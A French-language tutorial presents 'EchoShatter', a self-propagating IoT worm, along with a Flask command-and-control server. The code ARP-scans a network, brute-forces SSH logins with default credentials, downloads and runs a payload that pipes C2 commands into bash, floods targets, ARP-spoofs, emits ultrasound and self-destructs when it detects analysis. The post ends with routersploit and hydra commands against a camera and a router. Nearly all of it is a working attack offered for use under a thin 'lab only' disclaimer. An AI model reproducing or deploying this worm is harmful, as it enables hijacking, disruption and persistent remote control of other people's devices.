👾 ECHOSHATTER – LE BRISEUR D’ÉCHOS IoT 👾

Un ver qui pirate les IoT, perturbe tout, et sème le chaos – Lab only !

💥 Bienvenue dans le Chaos IoT !

Salut, c’est ton guide du néant connecté ! EchoShatter, c’est une bête qui pirate les IoT – caméras, enceintes, ampoules – et les transforme en armes de ouf. Ultrasons pour rendre les capteurs fous, floods pour saturer les réseaux, clignotements pour narguer les victimes. Il se propage comme un virus, reste furtif, et s’autodétruit si on le traque. Tout ça sur Kali, dans un lab fermé, pour apprendre à fond. Prêt à faire trembler le futur ? 😈

🏠 Ton Labo Réaliste

Pour que ça claque, on simule un réseau réel avec des IoT vulnérables :

Pourquoi ? Ça te met dans un vrai scénario – un réseau domestique ou PME mal sécurisé. Tu vois si EchoShatter passe les défenses.

⚙️ Setup de Kali

Prépare ta machine pour le carnage :

sudo apt update && sudo apt install -y nmap routersploit hydra sox hping3 python3-pip
pip3 install flask scapy requests pyotp

Serveur C2

Crée `c2.py` :

from flask import Flask, request
import pyotp

app = Flask(__name__)
secret = "YOURSECRET1234"  # Change ça
totp = pyotp.TOTP(secret)

@app.route("/control", methods=["POST"])
def control():
    token = request.headers.get("X-Token")
    if not token or not totp.verify(token):
        return "Unauthorized", 401
    data = request.json
    print(f"Commande: {data}")
    return {"status": "OK"}, 200

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)

Lance-le : `python3 c2.py`, puis Ngrok : `./ngrok http 5000`. Note l’URL (ex. `http://abc123.ngrok.io`). Le TOTP sécurise le C2.

🐍 EchoShatter – Le Code Hardcore

Ce script est une bombe : scan, exploit, disruption, propagation, furtivité. Voilà le code :

import os
import socket
import subprocess
import requests
import scapy.all as scapy
import pyotp
import time
import random
import threading

C2_URL = "http://your-ngrok-url.ngrok.io/control"  # Remplace par ton URL Ngrok
TARGET_SUBNET = "192.168.1.0/24"
SECRET = "YOURSECRET1234"  # Même secret que C2
PAYLOAD_URL = "http://192.168.1.100/echo.sh"  # Ton serveur local

def get_totp():
    return pyotp.TOTP(SECRET).now()

def scan_iot():
    arp = scapy.ARP(pdst=TARGET_SUBNET)
    ether = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    packet = ether/arp
    result = scapy.srp(packet, timeout=2, verbose=False)[0]
    devices = [{"ip": r[1].psrc, "mac": r[1].hwsrc} for r in result]
    return devices

def exploit_iot(ip):
    creds = [("admin", "admin"), ("root", "root"), ("user", "1234")]
    for user, pwd in creds:
        try:
            result = subprocess.run(f"hydra -l {user} -p {pwd} {ip} ssh -t 4 -W 1", shell=True, timeout=10, capture_output=True, text=True)
            if "success" in result.stdout.lower():
                subprocess.run(f"ssh {user}@{ip} 'wget {PAYLOAD_URL} -O /tmp/echo.sh; chmod +x /tmp/echo.sh; /tmp/echo.sh &'",
                             shell=True, timeout=10)
                return True
        except:
            continue
    return False

def disrupt(ip):
    # Ultrasons (18 kHz, inaudible mais perturbant)
    cmd = f"ssh admin@{ip} 'sox -n -t wav /tmp/noise.wav synth 10 sin 18000 vol 0.9; play /tmp/noise.wav repeat 5 &'"
    subprocess.run(cmd, shell=True)
    # Flood réseau
    subprocess.run(f"hping3 -S -p 80 --flood {ip} &", shell=True)
    # Spoofing ARP (bonus chaos)
    threading.Thread(target=arp_spoof, args=(ip, "192.168.1.1")).start()

def arp_spoof(target_ip, gateway_ip):
    target_mac = [d["mac"] for d in scan_iot() if d["ip"] == target_ip][0]
    pkt = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip)
    while True:
        scapy.send(pkt, verbose=False)
        time.sleep(2)

def self_destruct():
    if os.path.exists("/proc/net/nf_conntrack") or "nmap" in subprocess.getoutput("ps aux"):
        subprocess.run("rm -rf /tmp/*", shell=True)
        os._exit(1)

def report(devices):
    headers = {"X-Token": get_totp()}
    requests.post(C2_URL, json={"devices": devices, "status": "infected"}, headers=headers, timeout=5)

def propagate():
    devices = scan_iot()
    for dev in devices:
        if exploit_iot(dev["ip"]):
            disrupt(dev["ip"])
            report([dev])

def main():
    while True:
        self_destruct()
        propagate()
        time.sleep(random.randint(10, 30))  # Délai aléatoire pour furtivité

if __name__ == "__main__":
    main()

Payload IoT (echo.sh) :

#!/bin/bash
while true; do
    curl -s http://your-ngrok-url.ngrok.io/control -H "X-Token: $(python3 -c 'import pyotp; print(pyotp.TOTP(\"YOURSECRET1234\").now())')" | bash
    sleep 10
done

Fonctionnement

Serveur Local : Héberge `echo.sh` sur Kali avec `python3 -m http.server 80`.

🔥 Exploits pour Lancer le Bordel

Caméra IP (CVE-2018-9995)

routersploit
use scanners/autopwn
set target 192.168.1.102
run
use exploits/dlink/dcs_930l_unauth_exec
set target 192.168.1.102
run

Upload et exécute :

ssh admin@192.168.1.102 'wget http://192.168.1.100/echo.sh -O /tmp/echo.sh; chmod +x /tmp/echo.sh; /tmp/echo.sh'

Routeur TP-Link

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.1 http-get /

⚠️ Attention !

Lab Only : Ce truc est pour ton lab fermé. Dans le wild, c’est illégal et ça casse tout.

Sécu : Réseau isolé obligatoire. Ça peut péter ton matos sinon.